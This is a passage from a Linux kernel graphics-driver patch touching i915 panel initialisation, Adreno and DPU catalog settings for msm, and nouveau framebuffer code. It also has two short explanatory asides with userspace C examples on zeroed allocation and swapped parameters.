++				  struct intel_panel *panel,
++				  const struct intel_bios_encoder_data *devdata,
++				  const struct edid *edid,
++				  bool use_fallback)
+ {
+-	init_vbt_panel_defaults(panel);
++	/* already have it? */
++	if (panel->vbt.panel_type >= 0) {
++		drm_WARN_ON(&i915->drm, !use_fallback);
++		return;
++	}
+ 
+-	panel->vbt.panel_type = get_panel_type(i915, devdata, edid);
++	panel->vbt.panel_type = get_panel_type(i915, devdata,
++					       edid, use_fallback);
++	if (panel->vbt.panel_type < 0) {
++		drm_WARN_ON(&i915->drm, use_fallback);
++		return;
++	}
++
++	init_vbt_panel_defaults(panel);
+ 
+ 	parse_panel_options(i915, panel);
+ 	parse_generic_dtd(i915, panel);
+@@ -3221,6 +3243,21 @@ void intel_bios_init_panel(struct drm_i915_private *i915,
+ 	parse_mipi_sequence(i915, panel);
+ }
+ 
++void intel_bios_init_panel_early(struct drm_i915_private *i915,
++				 struct intel_panel *panel,
++				 const struct intel_bios_encoder_data *devdata)
++{
++	intel_bios_init_panel(i915, panel, devdata, NULL, false);
++}
++
++void intel_bios_init_panel_late(struct drm_i915_private *i915,
++				struct intel_panel *panel,
++				const struct intel_bios_encoder_data *devdata,
++				const struct edid *edid)
++{
++	intel_bios_init_panel(i915, panel, devdata, edid, true);
++}
++
+ /**
+  * intel_bios_driver_remove - Free any resources allocated by intel_bios_init()
+  * @i915: i915 device instance
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.h b/drivers/gpu/drm/i915/display/intel_bios.h
+index e375405a78284..ff1fdd2e0c1c5 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.h
++++ b/drivers/gpu/drm/i915/display/intel_bios.h
+@@ -232,10 +232,13 @@ struct mipi_pps_data {
+ } __packed;
+ 
+ void intel_bios_init(struct drm_i915_private *dev_priv);
+-void intel_bios_init_panel(struct drm_i915_private *dev_priv,
+-			   struct intel_panel *panel,
+-			   const struct intel_bios_encoder_data *devdata,
+-			   const struct edid *edid);
++void intel_bios_init_panel_early(struct drm_i915_private *dev_priv,
++				 struct intel_panel *panel,
++				 const struct intel_bios_encoder_data *devdata);
++void intel_bios_init_panel_late(struct drm_i915_private *dev_priv,
++				struct intel_panel *panel,
++				const struct intel_bios_encoder_data *devdata,
++				const struct edid *edid);
+ void intel_bios_fini_panel(struct intel_panel *panel);
+ void intel_bios_driver_remove(struct drm_i915_private *dev_priv);
+ bool intel_bios_is_valid_vbt(const void *buf, size_t size);
+diff --git a/drivers/gpu/drm/i915/display/intel_connector.c b/drivers/gpu/drm/i915/display/intel_connector.c
+index 6205ddd3ded03..562da3b741e2d 100644
+--- a/drivers/gpu/drm/i915/display/intel_connector.c
++++ b/drivers/gpu/drm/i915/display/intel_connector.c
+@@ -54,7 +54,7 @@ int intel_connector_init(struct intel_connector *connector)
+ 	__drm_atomic_helper_connector_reset(&connector->base,
+ 					    &conn_state->base);
+ 
+-	INIT_LIST_HEAD(&connector->panel.fixed_modes);
++	intel_panel_init_alloc(connector);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index f07395065a69f..1b6989001ee2b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -291,7 +291,7 @@ struct intel_vbt_panel_data {
+ 	struct drm_display_mode *sdvo_lvds_vbt_mode; /* if any */
+ 
+ 	/* Feature bits */
+-	unsigned int panel_type:4;
++	int panel_type;
+ 	unsigned int lvds_dither:1;
+ 	unsigned int bios_lvds_val; /* initial [PCH_]LVDS reg val in VBIOS */
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 75070eb07d4bf..1edb21f698087 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -5202,6 +5202,9 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 		return false;
+ 	}
+ 
++	intel_bios_init_panel_early(dev_priv, &intel_connector->panel,
++				    encoder->devdata);
++
+ 	intel_pps_init(intel_dp);
+ 
+ 	/* Cache DPCD and EDID for edp. */
+@@ -5237,8 +5240,8 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 	}
+ 	intel_connector->edid = edid;
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel,
+-			      encoder->devdata, IS_ERR(edid) ? NULL : edid);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel,
++				   encoder->devdata, IS_ERR(edid) ? NULL : edid);
+ 
+ 	intel_panel_add_edid_fixed_modes(intel_connector, true);
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_lvds.c b/drivers/gpu/drm/i915/display/intel_lvds.c
+index 7bf1bdfd03ec0..aecec992cd0d2 100644
+--- a/drivers/gpu/drm/i915/display/intel_lvds.c
++++ b/drivers/gpu/drm/i915/display/intel_lvds.c
+@@ -964,8 +964,8 @@ void intel_lvds_init(struct drm_i915_private *dev_priv)
+ 	}
+ 	intel_connector->edid = edid;
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL,
+-			      IS_ERR(edid) ? NULL : edid);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, NULL,
++				   IS_ERR(edid) ? NULL : edid);
+ 
+ 	/* Try EDID first */
+ 	intel_panel_add_edid_fixed_modes(intel_connector, true);
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.c b/drivers/gpu/drm/i915/display/intel_panel.c
+index 1640726bfbf6a..609fcdbd7d58d 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.c
++++ b/drivers/gpu/drm/i915/display/intel_panel.c
+@@ -661,6 +661,14 @@ intel_panel_mode_valid(struct intel_connector *connector,
+ 	return MODE_OK;
+ }
+ 
++void intel_panel_init_alloc(struct intel_connector *connector)
++{
++	struct intel_panel *panel = &connector->panel;
++
++	connector->panel.vbt.panel_type = -1;
++	INIT_LIST_HEAD(&panel->fixed_modes);
++}
++
+ int intel_panel_init(struct intel_connector *connector)
+ {
+ 	struct intel_panel *panel = &connector->panel;
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.h b/drivers/gpu/drm/i915/display/intel_panel.h
+index 5c5b5b7f95b6c..4b51e1c51da62 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.h
++++ b/drivers/gpu/drm/i915/display/intel_panel.h
+@@ -18,6 +18,7 @@ struct intel_connector;
+ struct intel_crtc_state;
+ struct intel_encoder;
+ 
++void intel_panel_init_alloc(struct intel_connector *connector);
+ int intel_panel_init(struct intel_connector *connector);
+ void intel_panel_fini(struct intel_connector *connector);
+ enum drm_connector_status
+diff --git a/drivers/gpu/drm/i915/display/intel_sdvo.c b/drivers/gpu/drm/i915/display/intel_sdvo.c
+index 329b9d9af6679..21805c15d5eb8 100644
+--- a/drivers/gpu/drm/i915/display/intel_sdvo.c
++++ b/drivers/gpu/drm/i915/display/intel_sdvo.c
+@@ -2886,7 +2886,7 @@ intel_sdvo_lvds_init(struct intel_sdvo *intel_sdvo, u16 type)
+ 	if (!intel_sdvo_create_enhance_property(intel_sdvo, intel_sdvo_connector))
+ 		goto err;
+ 
+-	intel_bios_init_panel(i915, &intel_connector->panel, NULL, NULL);
++	intel_bios_init_panel_late(i915, &intel_connector->panel, NULL, NULL);
+ 
+ 	/*
+ 	 * Fetch modes from VBT. For SDVO prefer the VBT mode since some
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index 84481030883ac..662bdb656aa30 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -1916,7 +1916,7 @@ void vlv_dsi_init(struct drm_i915_private *dev_priv)
+ 
+ 	intel_dsi->panel_power_off_time = ktime_get_boottime();
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL, NULL);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, NULL, NULL);
+ 
+ 	if (intel_connector->panel.vbt.dsi.config->dual_link)
+ 		intel_dsi->ports = BIT(PORT_A) | BIT(PORT_C);
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 660ba0db89002..047c5e8c87ff4 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -151,8 +151,8 @@ static void a5xx_submit(struct msm_gpu *gpu, struct msm_gem_submit *submit)
+ 	OUT_RING(ring, 1);
+ 
+ 	/* Enable local preemption for finegrain preemption */
+-	OUT_PKT7(ring, CP_PREEMPT_ENABLE_GLOBAL, 1);
+-	OUT_RING(ring, 0x02);
++	OUT_PKT7(ring, CP_PREEMPT_ENABLE_LOCAL, 1);
++	OUT_RING(ring, 0x1);
+ 
+ 	/* Allow CP_CONTEXT_SWITCH_YIELD packets in the IB2 */
+ 	OUT_PKT7(ring, CP_YIELD_ENABLE, 1);
+@@ -806,7 +806,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 	gpu_write(gpu, REG_A5XX_RBBM_AHB_CNTL2, 0x0000003F);
+ 
+ 	/* Set the highest bank bit */
+-	if (adreno_is_a540(adreno_gpu))
++	if (adreno_is_a540(adreno_gpu) || adreno_is_a530(adreno_gpu))
+ 		regbit = 2;
+ 	else
+ 		regbit = 1;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+index 7658e89844b46..f58dd564d122b 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+@@ -63,7 +63,7 @@ static struct msm_ringbuffer *get_next_ring(struct msm_gpu *gpu)
+ 		struct msm_ringbuffer *ring = gpu->rb[i];
+ 
+ 		spin_lock_irqsave(&ring->preempt_lock, flags);
+-		empty = (get_wptr(ring) == ring->memptrs->rptr);
++		empty = (get_wptr(ring) == gpu->funcs->get_rptr(gpu, ring));
+ 		spin_unlock_irqrestore(&ring->preempt_lock, flags);
+ 
+ 		if (!empty)
+@@ -207,6 +207,7 @@ void a5xx_preempt_hw_init(struct msm_gpu *gpu)
+ 		a5xx_gpu->preempt[i]->wptr = 0;
+ 		a5xx_gpu->preempt[i]->rptr = 0;
+ 		a5xx_gpu->preempt[i]->rbase = gpu->rb[i]->iova;
++		a5xx_gpu->preempt[i]->rptr_addr = shadowptr(a5xx_gpu, gpu->rb[i]);
+ 	}
+ 
+ 	/* Write a 0 to signal that we aren't switching pagetables */
+@@ -257,7 +258,6 @@ static int preempt_init_ring(struct a5xx_gpu *a5xx_gpu,
+ 	ptr->data = 0;
+ 	ptr->cntl = MSM_GPU_RB_CNTL_DEFAULT | AXXX_CP_RB_CNTL_NO_UPDATE;
+ 
+-	ptr->rptr_addr = shadowptr(a5xx_gpu, ring);
+ 	ptr->counter = counters_iova;
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index 36f062c7582f9..c5c4c93b3689c 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -558,7 +558,8 @@ static void adreno_unbind(struct device *dev, struct device *master,
+ 	struct msm_drm_private *priv = dev_get_drvdata(master);
+ 	struct msm_gpu *gpu = dev_to_gpu(dev);
+ 
+-	WARN_ON_ONCE(adreno_system_suspend(dev));
++	if (pm_runtime_enabled(dev))
++		WARN_ON_ONCE(adreno_system_suspend(dev));
+ 	gpu->funcs->destroy(gpu);
+ 
+ 	priv->gpu_pdev = NULL;
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 83f1dd2c22bd7..e8a217d242ca7 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -12,11 +12,15 @@
+ #include "dpu_hw_catalog.h"
+ #include "dpu_kms.h"
+ 
+-#define VIG_MASK \
++#define VIG_BASE_MASK \
+ 	(BIT(DPU_SSPP_SRC) | BIT(DPU_SSPP_QOS) |\
+-	BIT(DPU_SSPP_CSC_10BIT) | BIT(DPU_SSPP_CDP) |\
++	BIT(DPU_SSPP_CDP) |\
+ 	BIT(DPU_SSPP_TS_PREFILL) | BIT(DPU_SSPP_EXCL_RECT))
+ 
++#define VIG_MASK \
++	(VIG_BASE_MASK | \
++	BIT(DPU_SSPP_CSC_10BIT))
++
+ #define VIG_MSM8998_MASK \
+ 	(VIG_MASK | BIT(DPU_SSPP_SCALER_QSEED3))
+ 
+@@ -26,10 +30,7 @@
+ #define VIG_SC7180_MASK \
+ 	(VIG_MASK | BIT(DPU_SSPP_QOS_8LVL) | BIT(DPU_SSPP_SCALER_QSEED4))
+ 
+-#define VIG_SM8250_MASK \
+-	(VIG_MASK | BIT(DPU_SSPP_QOS_8LVL) | BIT(DPU_SSPP_SCALER_QSEED3LITE))
+-
+-#define VIG_QCM2290_MASK (VIG_MASK | BIT(DPU_SSPP_QOS_8LVL))
++#define VIG_QCM2290_MASK (VIG_BASE_MASK | BIT(DPU_SSPP_QOS_8LVL))
+ 
+ #define DMA_MSM8998_MASK \
+ 	(BIT(DPU_SSPP_SRC) | BIT(DPU_SSPP_QOS) |\
+@@ -51,7 +52,7 @@
+ 	(DMA_MSM8998_MASK | BIT(DPU_SSPP_CURSOR))
+ 
+ #define MIXER_MSM8998_MASK \
+-	(BIT(DPU_MIXER_SOURCESPLIT) | BIT(DPU_DIM_LAYER))
++	(BIT(DPU_MIXER_SOURCESPLIT))
+ 
+ #define MIXER_SDM845_MASK \
+ 	(BIT(DPU_MIXER_SOURCESPLIT) | BIT(DPU_DIM_LAYER) | BIT(DPU_MIXER_COMBINED_ALPHA))
+@@ -283,10 +284,9 @@ static const struct dpu_caps msm8998_dpu_caps = {
+ };
+ 
+ static const struct dpu_caps qcm2290_dpu_caps = {
+-	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
++	.max_mixer_width = DEFAULT_DPU_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0x4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2,
+-	.ubwc_version = DPU_HW_UBWC_VER_20,
+ 	.has_dim_layer = true,
+ 	.has_idle_pc = true,
+ 	.max_linewidth = 2160,
+@@ -322,9 +322,9 @@ static const struct dpu_caps sc7180_dpu_caps = {
+ };
+ 
+ static const struct dpu_caps sm6115_dpu_caps = {
+-	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
++	.max_mixer_width = DEFAULT_DPU_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0x4,
+-	.qseed_type = DPU_SSPP_SCALER_QSEED3LITE,
++	.qseed_type = DPU_SSPP_SCALER_QSEED4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2, /* TODO: v2.5 */
+ 	.ubwc_version = DPU_HW_UBWC_VER_20,
+ 	.has_dim_layer = true,
+@@ -368,7 +368,7 @@ static const struct dpu_caps sc8180x_dpu_caps = {
+ static const struct dpu_caps sm8250_dpu_caps = {
+ 	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0xb,
+-	.qseed_type = DPU_SSPP_SCALER_QSEED3LITE,
++	.qseed_type = DPU_SSPP_SCALER_QSEED4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2, /* TODO: v2.5 */
+ 	.ubwc_version = DPU_HW_UBWC_VER_40,
+ 	.has_src_split = true,
+@@ -632,19 +632,19 @@ static const struct dpu_ctl_cfg sdm845_ctl[] = {
+ static const struct dpu_ctl_cfg sc7180_ctl[] = {
+ 	{
+ 	.name = "ctl_0", .id = CTL_0,
+-	.base = 0x1000, .len = 0xE4,
++	.base = 0x1000, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 9),
+ 	},
+ 	{
+ 	.name = "ctl_1", .id = CTL_1,
+-	.base = 0x1200, .len = 0xE4,
++	.base = 0x1200, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 10),
+ 	},
+ 	{
+ 	.name = "ctl_2", .id = CTL_2,
+-	.base = 0x1400, .len = 0xE4,
++	.base = 0x1400, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 11),
+ 	},
+@@ -838,9 +838,9 @@ static const struct dpu_sspp_cfg msm8998_sspp[] = {
+ 	SSPP_BLK("sspp_9", SSPP_DMA1, 0x26000,  DMA_MSM8998_MASK,
+ 		sdm845_dma_sblk_1, 5, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA1),
+ 	SSPP_BLK("sspp_10", SSPP_DMA2, 0x28000,  DMA_CURSOR_MSM8998_MASK,
+-		sdm845_dma_sblk_2, 9, SSPP_TYPE_DMA, DPU_CLK_CTRL_CURSOR0),
++		sdm845_dma_sblk_2, 9, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA2),
+ 	SSPP_BLK("sspp_11", SSPP_DMA3, 0x2a000,  DMA_CURSOR_MSM8998_MASK,
+-		sdm845_dma_sblk_3, 13, SSPP_TYPE_DMA, DPU_CLK_CTRL_CURSOR1),
++		sdm845_dma_sblk_3, 13, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA3),
+ };
+ 
+ static const struct dpu_sspp_cfg sdm845_sspp[] = {
+@@ -880,32 +880,32 @@ static const struct dpu_sspp_cfg sc7180_sspp[] = {
+ };
+ 
+ static const struct dpu_sspp_sub_blks sm6115_vig_sblk_0 =
+-				_VIG_SBLK("0", 2, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("0", 2, DPU_SSPP_SCALER_QSEED4);
+ 
+ static const struct dpu_sspp_cfg sm6115_sspp[] = {
+-	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SC7180_MASK,
+ 		sm6115_vig_sblk_0, 0, SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG0),
+ 	SSPP_BLK("sspp_8", SSPP_DMA0, 0x24000,  DMA_SDM845_MASK,
+ 		sdm845_dma_sblk_0, 1, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA0),
+ };
+ 
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_0 =
+-				_VIG_SBLK("0", 5, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("0", 5, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_1 =
+-				_VIG_SBLK("1", 6, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("1", 6, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_2 =
+-				_VIG_SBLK("2", 7, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("2", 7, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_3 =
+-				_VIG_SBLK("3", 8, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("3", 8, DPU_SSPP_SCALER_QSEED4);
+ 
+ static const struct dpu_sspp_cfg sm8250_sspp[] = {
+-	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_0, 0,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG0),
+-	SSPP_BLK("sspp_1", SSPP_VIG1, 0x6000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_1", SSPP_VIG1, 0x6000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_1, 4,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG1),
+-	SSPP_BLK("sspp_2", SSPP_VIG2, 0x8000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_2", SSPP_VIG2, 0x8000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_2, 8, SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG2),
+-	SSPP_BLK("sspp_3", SSPP_VIG3, 0xa000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_3", SSPP_VIG3, 0xa000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_3, 12,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG3),
+ 	SSPP_BLK("sspp_8", SSPP_DMA0, 0x24000,  DMA_SDM845_MASK,
+ 		sdm845_dma_sblk_0, 1, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA0),
+@@ -1065,7 +1065,7 @@ static const struct dpu_lm_cfg sc7280_lm[] = {
+ /* QCM2290 */
+ 
+ static const struct dpu_lm_sub_blks qcm2290_lm_sblk = {
+-	.maxwidth = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
++	.maxwidth = DEFAULT_DPU_LINE_WIDTH,
+ 	.maxblendstages = 4, /* excluding base layer */
+ 	.blendstage_base = { /* offsets relative to mixer base */
+ 		0x20, 0x38, 0x50, 0x68
+@@ -1216,7 +1216,7 @@ static const struct dpu_pingpong_cfg sm8150_pp[] = {
+ };
+ 
+ static const struct dpu_pingpong_cfg sc7280_pp[] = {
+-	PP_BLK("pingpong_0", PINGPONG_0, 0x59000, 0, sc7280_pp_sblk, -1, -1),
++	PP_BLK("pingpong_0", PINGPONG_0, 0x69000, 0, sc7280_pp_sblk, -1, -1),
+ 	PP_BLK("pingpong_1", PINGPONG_1, 0x6a000, 0, sc7280_pp_sblk, -1, -1),
+ 	PP_BLK("pingpong_2", PINGPONG_2, 0x6b000, 0, sc7280_pp_sblk, -1, -1),
+ 	PP_BLK("pingpong_3", PINGPONG_3, 0x6c000, 0, sc7280_pp_sblk, -1, -1),
+@@ -2007,8 +2007,6 @@ static const struct dpu_mdss_cfg qcm2290_dpu_cfg = {
+ 	.intf = qcm2290_intf,
+ 	.vbif_count = ARRAY_SIZE(sdm845_vbif),
+ 	.vbif = sdm845_vbif,
+-	.reg_dma_count = 1,
+-	.dma_cfg = &sdm845_regdma,
+ 	.perf = &qcm2290_perf_data,
+ 	.mdss_irqs = IRQ_SC7180_MASK,
+ };
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+index 7ada957adbbb8..58abf5fe97e20 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+@@ -572,6 +572,8 @@ void dpu_rm_release(struct dpu_global_state *global_state,
+ 		ARRAY_SIZE(global_state->ctl_to_enc_id), enc->base.id);
+ 	_dpu_rm_clear_mapping(global_state->dsc_to_enc_id,
+ 		ARRAY_SIZE(global_state->dsc_to_enc_id), enc->base.id);
++	_dpu_rm_clear_mapping(global_state->dspp_to_enc_id,
++		ARRAY_SIZE(global_state->dspp_to_enc_id), enc->base.id);
+ }
+ 
+ int dpu_rm_reserve(
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index 1c4be193fd23f..8ac1cd27746a0 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -626,8 +626,8 @@ static struct msm_submit_post_dep *msm_parse_post_deps(struct drm_device *dev,
+ 	int ret = 0;
+ 	uint32_t i, j;
+ 
+-	post_deps = kmalloc_array(nr_syncobjs, sizeof(*post_deps),
+-	                          GFP_KERNEL | __GFP_NOWARN | __GFP_NORETRY);
++	post_deps = kcalloc(nr_syncobjs, sizeof(*post_deps),
++			    GFP_KERNEL | __GFP_NOWARN | __GFP_NORETRY);
+ 	if (!post_deps)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -642,7 +642,6 @@ static struct msm_submit_post_dep *msm_parse_post_deps(struct drm_device *dev,
+ 		}
+ 
+ 		post_deps[i].point = syncobj_desc.point;
+-		post_deps[i].chain = NULL;
+ 
+ 		if (syncobj_desc.flags) {
+ 			ret = -EINVAL;
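
Switching kmalloc_array() to kcalloc() yields a zeroed array, which is why the explicit post_deps[i].chain = NULL store can go: every pointer and counter already starts out zero. A userspace sketch with calloc() standing in for kcalloc() (hypothetical struct, for illustration only):

#include <stdlib.h>

struct post_dep {
    void *chain;         /* starts NULL after calloc() */
    unsigned long point; /* starts 0 */
};

static struct post_dep *alloc_post_deps(size_t nr)
{
    /* calloc(), like kcalloc(), zero-fills the array and checks
     * nr * size for multiplication overflow. */
    return calloc(nr, sizeof(struct post_dep));
}

int main(void)
{
    struct post_dep *deps = alloc_post_deps(8);

    free(deps);
    return 0;
}
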
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/wndw.h b/drivers/gpu/drm/nouveau/dispnv50/wndw.h
+index 591c852f326b9..76a6ae5d56526 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/wndw.h
++++ b/drivers/gpu/drm/nouveau/dispnv50/wndw.h
+@@ -35,8 +35,9 @@ struct nv50_wndw {
+ 
+ int nv50_wndw_new_(const struct nv50_wndw_func *, struct drm_device *,
+ 		   enum drm_plane_type, const char *name, int index,
+-		   const u32 *format, enum nv50_disp_interlock_type,
+-		   u32 interlock_data, u32 heads, struct nv50_wndw **);
++		   const u32 *format, u32 heads,
++		   enum nv50_disp_interlock_type, u32 interlock_data,
++		   struct nv50_wndw **);
+ void nv50_wndw_flush_set(struct nv50_wndw *, u32 *interlock,
+ 			 struct nv50_wndw_atom *);
+ void nv50_wndw_flush_clr(struct nv50_wndw *, u32 *interlock, bool flush,
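
This hunk only reorders the declaration's parameters so they match the definition (heads ahead of the interlock pair -- assuming nv50/wndw.c defines it in that order). Because all the swapped parameters are 32-bit integer types, the mismatch compiles silently while arguments land in the wrong slots. A tiny illustration of why that class of bug gets no compiler help:

#include <stdio.h>

/* Both parameters are unsigned int, so swapping them between a stale
 * prototype and the definition is not a type error. */
static unsigned int scale(unsigned int num, unsigned int den)
{
    return 4096 * num / den;
}

int main(void)
{
    printf("%u\n", scale(3, 4)); /* 3072: intended */
    printf("%u\n", scale(4, 3)); /* 5461: swapped, still compiles */
    return 0;
}
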
+diff --git a/drivers/gpu/drm/nouveau/include/nvkm/subdev/fb.h b/drivers/gpu/drm/nouveau/include/nvkm/subdev/fb.h
+index c5a4f49ee2065..01a22a13b4520 100644
+--- a/drivers/gpu/drm/nouveau/include/nvkm/subdev/fb.h
++++ b/drivers/gpu/drm/nouveau/include/nvkm/subdev/fb.h
+@@ -2,6 +2,7 @@
+ #ifndef __NVKM_FB_H__
+ #define __NVKM_FB_H__
+ #include <core/subdev.h>
++#include <core/falcon.h>
+ #include <core/mm.h>
+ 
+ /* memory type/access flags, do not match hardware values */
+@@ -33,7 +34,7 @@ struct nvkm_fb {
+ 	const struct nvkm_fb_func *func;
+ 	struct nvkm_subdev subdev;
+ 
+-	struct nvkm_blob vpr_scrubber;
++	struct nvkm_falcon_fw vpr_scrubber;
+ 
+ 	struct {
+ 		struct page *flush_page;
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/base.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/base.c
+index bac7dcc4c2c13..0955340cc4218 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/base.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/base.c
+@@ -143,6 +143,10 @@ nvkm_fb_mem_unlock(struct nvkm_fb *fb)
+ 	if (!fb->func->vpr.scrub_required)
+ 		return 0;
+ 
++	ret = nvkm_subdev_oneinit(subdev);
++	if (ret)
++		return ret;
++
+ 	if (!fb->func->vpr.scrub_required(fb)) {
+ 		nvkm_debug(subdev, "VPR not locked\n");
+ 		return 0;
+@@ -150,7 +154,7 @@ nvkm_fb_mem_unlock(struct nvkm_fb *fb)
+ 
+ 	nvkm_debug(subdev, "VPR locked, running scrubber binary\n");
+ 
+-	if (!fb->vpr_scrubber.size) {
++	if (!fb->vpr_scrubber.fw.img) {
+ 		nvkm_warn(subdev, "VPR locked, but no scrubber binary!\n");
+ 		return 0;
+ 	}
+@@ -229,7 +233,7 @@ nvkm_fb_dtor(struct nvkm_subdev *subdev)
+ 
+ 	nvkm_ram_del(&fb->ram);
+ 
+-	nvkm_blob_dtor(&fb->vpr_scrubber);
++	nvkm_falcon_fw_dtor(&fb->vpr_scrubber);
+ 
+ 	if (fb->sysmem.flush_page) {
+ 		dma_unmap_page(subdev->device->dev, fb->sysmem.flush_page_addr,
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga100.c b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga100.c
+index 5098f219e3e6f..a7456e7864636 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga100.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/fb/ga100.c
+@@ -37,5 +37,5 @@ ga100_fb = {
+ int
